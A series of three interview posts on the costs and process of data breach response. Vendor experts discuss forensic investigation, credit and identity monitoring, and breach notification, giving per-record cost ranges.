Crisis Data Breach Response: Computer Forensic Services

A Q&A with Chris Novak, Managing Principal at Verizon Business
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. Today we’re looking at computer forensics, and I spoke with Chris Novak, managing principal at Verizon Business.

When and how do clients engage with your services?
Generally, we get the call from the IT security department or a CSO, and that usually depends on how mature the organization’s security practice is. They almost always find us through word of mouth unless the company already engages our services through our rapid response retainer. What we typically hear on that call is, “I believe we’ve had an incident but I need help understanding what happened exactly.”

What happens after the call?
That depends on whether this is a client using our services for the first time or whether they have us on rapid response retainer. If you think of an emergency room as an analogy, an organization calling us for the first time is treated as quickly as we can as we triage the situation along with our other clients’. The rapid response retainer means we already have an agreement and a plan in place and a good understanding of where and how to mobilize our resources, so that gets handled more quickly. Either way, the goal is to mobilize investigators to necessary locations. After that, the first step is getting the forensic acquisition—a duplicate copy of the relevant or suspect systems so that we can analyze them. Then we follow the timeline back from there. For a mom and pop type of business, the whole process might only take a week, but for, say, a major financial institution, we may be contracted out for six months or more with a dozen investigators on the case in London, Hong Kong, Singapore, Los Angeles and New York.

What problems or hurdles do you typically encounter?
One of the biggest hurdles we face is something that we call the “unknown unknowns”—essentially, these are the things people don’t realize that they don’t know, which makes it difficult to account for them. Think of it this way: If you don’t know where your sensitive data is, then where do you start the investigation? If you don’t know who has access to the data, but suspect insider involvement, how do you narrow down the investigative field? If your environment is purely designed for function and doesn’t easily accommodate forensic data collection, then even if we have the greatest hunches in the world as to what happened, we will have little to no evidence that can help prove the case. All of these have the potential to be non-starters for an investigation or otherwise dramatically increase the cost. Another issue is that sometimes organizations share resources without realizing it—their website or ecommerce site might be hosted in a data center with 19 other customers—so when we go to investigate the facility we run into roadblocks getting permission to access it. That can slow down the process.

What are the approximate costs for forensic services for a data breach?
We always shy away from giving dollar amounts because they can vary wildly. You might see a credit card company with millions of records but a very low per-record cost or an industrial company that has lost three or four records with intellectual property that could be worth a billion dollars of revenue. So not every record is the same and it is very hard to quantify the cost. I would say that your larger and more complicated breach investigations can easily range into the millions of dollars, while your smaller situations may run in the USD $20,000-50,000 range. I answer it this way not to be difficult, but rather to avoid giving anyone the misperception that all breach investigations are similar and/or have similar costs. The only other thing I can say is that if you are prepared for the data breach event, things will move more fluidly and it will ultimately cost less.

In conclusion…
Thanks, Chris, for these insights from the field. Computer forensics is an important part of the overall roadmap to recovery from a data breach incident. This service is vital to ascertaining the digital facts (who, what, when, where and how) of a data breach. Defense lawyers representing the breached company need to understand compliance duties and negligence factors, and insurance companies need to ascertain damages for insurance coverage payouts; all of these rely on forensic evidence. As Chris discussed, the cost can have a wide range (e.g., small incidents might amount to $20k-$50k, while large events could potentially cost several million dollars) based on various factors. However, when compiling the NetDiligence® 2011 Cyber Liability & Data Breach Insurance Claims study, we found the average cost for an insurance claim to be approximately $200,000 for the forensic expense component alone.

Crisis Data Breach Response: Credit Monitoring and ID Restoration

A Q&A with Rick Kam, President and Co-founder at ID Experts
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. Today we’re looking at credit monitoring, and I spoke with Rick Kam, President and Co-founder at ID Experts, which offers a spectrum of data breach response services including identity monitoring and recovery for healthcare, government, enterprise, education and financial service organizations.

At what point during a data breach does ID Experts get the call?
We’re like the fire department for data breach incidents. Usually we get engaged when the general counsel calls us—this is while the privacy officer and CIO begin to conduct some investigation about the nature of the situation. At the same time they might be reaching out to the risk manager to find out whether there’s insurance coverage so they know the financial impact involved.

What happens after the call?
Having your data stolen or becoming the victim of identity theft could potentially be a problem you have to deal with for the rest of your life. We want to make sure that those people whose data is stolen—whether they’re doctors or patients or anyone else—feel taken care of and can get their lives back in order. The next step in the process is to figure out who’s being affected by the breach and what information is out there. There are a lot of different monitoring options on the marketplace. While credit bureaus monitor credit activity, we can also use cyber-monitoring to track both financial and health data. A company like ours can look at the potential data that is missing, tailor our services and act like a one-stop shop to aggregate and deliver information about the missing data.

What problems or hurdles do you typically encounter?
The biggest challenge is the pressure people face. Everything’s hitting at once—there’s a lot of information and the privacy officer is overwhelmed with requests for information to make decisions and provide clarity where there may be no clarity. Another interesting challenge is the complexity of the ecosystems in today’s organizations. We work with healthcare systems that have both hospital and university education sides so there are multiple management teams—getting them to agree and getting everyone on the same page can be tricky. Sometimes you’re talking about the FBI and the Secret Service in the mix as well, so it’s a communication challenge. One of the first things we have to do is get a consolidated view of what the management wants to accomplish so that we can say, “here are the different options that will help you facilitate those goals.”

What are the approximate costs for credit monitoring and ID restoration services?
Costs per record can range from US$5 to $20. That said, every breach, whether it affects five or five million people, is different and there are many factors that can impact the cost. The full spectrum of services is obviously going to cost more. Often people want to minimize the cost because a breach is an unplanned, unbudgeted expense but we try to educate them and make it clear that the financial impact can be much greater when you don’t do the right job. Having “delighted victims,” people who are satisfied by your response, is going to cost much less than uproar in the media or class action litigation. We like to say that we deliver positive outcomes because none of our clients in over 500 breaches have been fined by regulatory bodies nor have they had any class action litigation suits brought against them.

In conclusion…
Thanks, Rick, for sharing your insight. At NetDiligence, we’ve seen that credit and identity monitoring are valuable services that allow businesses to offer potential data breach victims both a goodwill gesture and a proactive way to help mitigate potential harm/loss. Having said that, there’s a time and place for these services. One might argue that the first call should go to a privacy lawyer (what we call a Breach Coach® in eRisk Hub®) to help the client with the decision to offer additional services (or not), given the facts surrounding the case. For example, if the data breach event was caused by a malicious actor and resulted in a loss of social security numbers—the “Holy Grail” of data—and fraud is already occurring in the victim pool, this obviously would be grounds to offer victims an effective remedial monitoring service.

Crisis Data Breach Response: Notification

A Q&A with Larissa K. Crum, Executive Vice President at Immersion, Ltd.
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. This first post focuses on notification, and I spoke with Larissa K. Crum, Executive Vice President at Immersion, Ltd., which provides printing, mailing, emailing, call center, and returned mail management services.

At what point during a data breach does Immersion get the call?
I like to say that attorneys get the call on Friday at four p.m. and I get the call at seven. The first call usually goes out to an attorney (what we call the Breach Coach® in the eRisk Hub®) and sometimes forensics, but we’re getting calls sooner than we used to because of tight response deadlines. Since it’s such a small community in the industry, I’ll often get the heads up from someone I know about a project coming our way—we may not start the process of working with the company for another week, but it helps us look down the line and prepare. Occasionally we get a call from an employee who’s done a Google search. Most frequently, though, we hear from attorneys, insurance carriers and clients we already work with.

What happens after the call?
For our clients, we’ve already built an instant response plan so when we get the call it’s usually a matter of reminding everyone to follow the plan. With new clients, we build from scratch. But either way, we start with the address file and run a verification service to make sure the addresses are still valid. We look for people who’ve died so we can contact their next of kin according to regulations. Then we send out mail and sometimes email notifications. We set up the call center so it’s in place as soon as anything goes out because the majority of calls come in the first five to eight days after the notification goes out, and those people are usually the most upset and need to talk to someone.

What problems or hurdles do you typically encounter?
There are several. First, we are typically up against a regulatory deadline that is very tight, specifically with state or Federal statutes that have a specified response deadline (e.g., 5 days, 30 days, 45 days). Some of these timelines seem long, but there are many parts of a data breach response effort that need to be coordinated and you could end up eating days on cleaning up an address file, determining the signature at the bottom of the notice, or approving numerous versions of a letter.

The second common hurdle is thinking through the call center response process. Setting up a call center to handle notices (written, electronic or substitute notices) goes beyond supplying appropriate FAQs. Thinking through the call escalation process is often a bigger issue for a client, particularly on large breaches where you could have hundreds of calls a day escalated within the first week. Having a system in place and proper management is often the difference between a strong or weak data breach response effort. After all, if a call gets escalated back to the organization that had the breach and it is not handled properly, this is the last image that the affected individual has about your organization. I heard an industry colleague say it best, “think of the response to the response.”

The final problem most commonly overlooked is the return address that appears when the notice goes in the mail. Most organizations assume that it should be their address. However, if you think about the amount of return mail as a percentage of the total number of notices going out, you quickly realize that most organizations are not prepared to handle or manage the volume of notices that will come back. There is a direct correlation between the age of the addresses provided and the percentage of returned mail. The newer the addresses, the lower the percentage of returns. The older the addresses, the higher the percentage of returns.

What are the approximate costs for notification services?
The cost can be anywhere from $1 to $4 USD per record. The size of a company isn’t always reflective of the size of a breach—a company with five employees can hold over 1 million records. Because of the potential for data breach services to become very expensive very quickly, we recommend purchasing a cyber liability policy. Most carriers have pre-negotiated pricing with vendors that provide all of the elements in a data breach response effort, e.g. legal, forensics, notification, call center and credit monitoring. Having a cyber liability policy helps transfer the risk and cost of a data breach; however, organizations that proactively put together a data breach incident response plan can help mitigate the risk of a breach occurring.

In conclusion…
Thanks, Larissa, for sharing your experience and insights into the notification process. Note: Larissa’s cost estimates dovetail with our own findings in the NetDiligence® 2011 Cyber Liability & Data Breach Insurance Claims study.
